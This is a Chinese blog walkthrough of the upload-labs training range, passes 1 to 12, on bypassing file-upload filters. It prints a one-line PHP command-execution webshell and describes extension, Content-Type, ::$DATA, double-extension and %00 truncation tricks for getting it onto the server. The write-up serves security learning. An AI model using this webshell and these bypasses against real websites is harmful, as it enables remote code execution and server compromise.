upload 靶场练习

已于 2024-01-13 00:54:44 修改
阅读量419 收藏 12
点赞数 10
文章标签: 网络 安全
于 2023-12-30 00:05:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalungame/article/details/135298717
版权

Pass 1 js前端绕过

当数据包在发往后台(后端)的时候,bp才能抓到包,如果bp抓不到,说明数据包没有经过客户端发往后端,就被阻拦下来了。

创建一个php文件,里面包含一句话木马:<?php @system($_GET['a']); ?>

(GET括号里面的a为蚁剑连接密码)

将文件后缀修改成能上传的文件,开启抓包,点击上传

将1.jpg改成1.php(因为已经上传成功了,绕过了前端的验证)

改完后直接放包回去,图片就会上传成功了

打开图像之后复制网址,打开蚁剑

添加数据后双击,即可进入到服务器目录

Pass 2 content-type 绕过

首先,放php文件,上传失败

接着,放一个png/jpg文件,上传成功。

刷新,再放一次png文件,抓包,我们试着删掉content-type,看看照片上传成功的原因和它有没有关系

删掉之后,放包,文件就会上传失败

因此,文件的上传与content-type有关系

再上传php文件,抓包,将之前抓包的png文件的Content-Type替换掉php文件的,放包

上传成功

接下来的操作参考Pass 1即可

Pass 3 php3绕过或php5绕过(步骤较繁琐)

上传一个php,结果如图

不允许上传的后缀文件我们称之为黑名单

看一下源码

可以看出,源码中对加点、大写绕过、DATA绕过、加空格绕过这几种方法都有了防范

网上查到可以把后缀改成php3或者php5,我尝试了一下,虽然文件上传成功了,但始终无法在蚁剑测试连接成功

最后,我查到了原因。

还是直接说操作流程吧。

首先,下一个phpstudy2016,配置好站点域名并将upload文件下载到www路径

切换版本为5.4.45+apache(不要有-nts,这是一个线程问题)

之后其他选项菜单--- 打开配置文件 --- hppd-conf

打开文件之后,编辑--查找,输入addtype向下搜索,找到和403行一样的就行

将403行改成下面这样

AddType application/x-httpd-php .php .php3 .php5 .phtml

AddType application,增加类型的应用解释,.php3 .php5 .phtml等都看作php文件

保存之后重启phpstudy功能,进入靶场

之后的流程和前面一样,上传php文件,抓包改后缀,打开图像,用蚁剑添加数据。。。

Pass 4 

上传含有一句话木马文件1.php修改过的1.jpg,抓包,将后缀改成1.php. .(php+点+空格+点)

放包,文件上传成功,之后就是打开图像,用蚁剑连接即可。

Pass 5

可以用和Pass 4一样的方法

Pass 6 大写绕过

源码缺少了下面的代码

$file_ext = strtolower($file_ext); //转换为小写

Pass 7 空格绕过

抓包后缀加空格就好了,原理就是,原码没有防范这个方法(首尾去空)

Pass 8  后缀加点绕过

源码相比之前缺少了下面的代码

$file_name = deldot($file_name);//删除文件名末尾的点

既然它不删除文件名末尾的点,那我们就在文件后缀加点即可。

上传一句话木马php文件,抓包,后缀加一个点,文件上传成功。

至于蚁剑上的后缀要不要去点,一般系统会自动帮你去掉,如果不行就手动去点吧。

Pass 9  $Data绕过

这一关,没有对DATA处理,上传php文件抓包,后缀加上::DATA

放包让文件上传,打开图像复制网址,用蚁剑连接服务器,删掉增加的后缀就可连接成功

Pass 10 点空格点绕过

黑名单

参考Pass 9,上传php文件抓包后缀加:点空格点(. .)

其他操作流程一样

Pass 11  双写后缀绕过

查看源码,黑名单老样子

函数解析

$file_name = str_ireplace($deny_ext,"", $file_name);

该函数为替换函数

作用是将 上传的文件$file_name中含有黑名单文件的部分$deny_ext替换成空字符

我们试着上传一个php文件,成功后打开图像

就会发现后缀php变成的空

因为这个函数只执行一次,所以我们使用双写绕过方式通关

上传文件抓包后缀改成pphphp

(因为函数是从左到右执行,p php ph,删掉第一个遇到的php后,不会再回头看p,只会往后,后面只有hp,所以最后就会剩下php)

Pass 12 %00截断

知识点

0x00和%00都表示空,一个在编程语言中,一个在url编码中

url编码是将Ascll转化为16进制,再加%

例如,在百度上搜索 你好吗+空格空格空格

我们会发现后面有三个%20,这个就是url编码

在ascll中,空格就是数字32,转换为16进制就是20

那么%00对照ASCLL表就是空字符

我们在百度链接你好后面加上%00,回车发现搜索框里就会变成了你好

我们已经清楚的知道了%00的来源和作用

开始通关

查看源码 

 $ext_arr = array('jpg','png','gif');

只给上传三种文件(白名单) 

上传一个jpg文件,抓包,在upload/后面加上111.php%00(将文件的后缀改成php)

dalungame
关注
  • 10
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Upload-labs 1-20关靶场通关攻略(全网最全最完整),2024年最新2024-2024阿里巴巴网络安全面试真题解析
2401_83947194的博客
04-14 1009
试一下我们的结果是否可行,很明显,我们上传成功,执行一下我们的一句话(同第一关)ok,下一关。
upload-labs靶场详解
人若有志,就不会在半坡停止。
11-07 1717
1.定义:是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。本质为Apache配置⽂件,提供 了针对⽬录改变配置的⽅法,在⼀个特定的⽂档⽬录中放置⼀个包含⼀个或多个指 令的⽂件,2.允许.htaccess⽂件使⽤,httpd.conf配置⽂件中AllowOverride参数设置为All。3.参数:type 表示可以被分多个子类的独立类别,subtype 表示细分后的每个类型。以作⽤于此⽬录及其所有⼦⽬录,管理相关⽬录下的⽹⻚配置。
文件上传漏洞(一) upload-labs靶场练习
好好睡觉
03-18 5582
常见文件上传漏洞类型总结、upload-labs靶场
文件上传 —— 靶场upload-labs-master
weixin_54431413的博客
03-23 7766
upload-labs靶场文件上传,前端和黑白名单验证绕过,代码逻辑问题。
Upload-labs 1-20关靶场通关攻略(全网最全最完整)
dragon的博客
03-15 3614
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为php 当 PHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
upload靶场1-11】基础关卡:特点、分析、利用
07-19 805
upload靶场
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞的靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
WEB渗透学习-upload-labs靶场
04-20
总的来说,"upload-labs"靶场是Web渗透初学者和进阶者理想的练习平台,它能够系统性地提升你在文件上传漏洞方面的技能。无论你是想在网络安全领域发展,还是仅仅对这个话题感兴趣,投入时间在这个靶场上,都将是一次...
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
安装upload-labs
10-22
2. 根据关卡提示信息练习upload-labs提供了多个关卡,每个关卡都有特定的挑战和任务,您可以根据关卡提示信息进行练习和挑战。 3. 参考write up(通关指南):如果您遇到困难或需要帮助,可以参考write up(通关...
upload-labs靶场通关指南
07-02
Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场的通关指南,涵盖了从基础的文件上传漏洞到高级的文件包含漏洞的利用方法。...
upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 4207
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
打靶归来 - 详解upload-labs靶场(上)
qq_52643498的博客
09-15 2421
一、靶场的搭建 ① - 靶场环境的搭建 下载地址:upload-labs upload-labs靶场曾有过一次更新,更新新添加了一道Pass-05,有一些以前的教程的题号与这篇教程不符合,请各位自行分辨 作者所用到的PHP版本为 ...
Upload-labs 1-20关靶场通关攻略(全网最全最完整),2024年最新美团网络安全研发岗二面
最新发布
04-15 1064
我们可以看到img_path是通过get传参传递的,那么我们不妨在这块将路径改掉,改为upload/web.php%00,那么后面不管是什么东西都会被截断掉,然后经过move_uploaded_file函数将临时文件重新复制给我们的截断之前的文件路径,当然,我们还是要上传jpg文件的,使得我们可以进行下面程序的运行。那么这时候怎么办呢,我们看到他的过滤数组里有小写、大小写混写,但没有纯大写,在下面也没看到转小写,而且我们的php文件名是不区分大小写的,ok,思路有了,直接开整。不在则对其进行删除。
uploads文件上传靶场练习
weixin_43353955的博客
05-28 218
源代码可判断为前端js校验只需要前端发jpg包后抓包修改访问图片地址即可源代码支队文件type类型做了限制 抓包修改即可源代码strrchr()函数(在php中)查找字符在指定字符串中从右面开始的第一次出现的位置,如果成功,返回该字符以及其后面的字符,如果失败,则返回 NULL。str_ireplace()函数作用将::$DATA替换为空这一关利用黑名单容易被绕过的特性 常见后缀名如下:aspasacdxcerphpaspxashxjspphp3。
文件上传(做完upload靶场的总结)
m0_73100250的博客
08-12 173
文件上传相关知识
upload-labs靶场实战笔记(全部)
lizhiwei21的博客
11-14 176
文件上传的时候,会有一个数据包,数据包只有在经过客户端之后, 在发往后台发往服务器的时候,抓包工具才会进行抓包.如果抓包没有抓到,说明验证是在前端进行验证的.方法1抓包首先上传一个jpg文件,然后进行抓包,在后台将.jpg改成.php(你所上传的文件后缀).然后forward,会发现上传成功,但是点开这个图片会发现它并不是图片,而是你所上传的非jpg文件方法2 前端绕过直接禁用javascript,会发现可以成功上传,新标签页打开,发现是php文件.方法3。
【文件上传漏洞-02】前端限制与绕过靶场实战
cc
02-14 5354
由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过。由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过。
upload-labs靶场
09-15
upload-labs是一个靶场,通过在其中进行文件上传漏洞的练习,来增强对该漏洞的理解和掌握。该靶场存在白名单绕过和大小写绕过两种方式。在白名单绕过方面,可以利用mime类型和文件名后缀的绕过。在大小写绕过方面,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值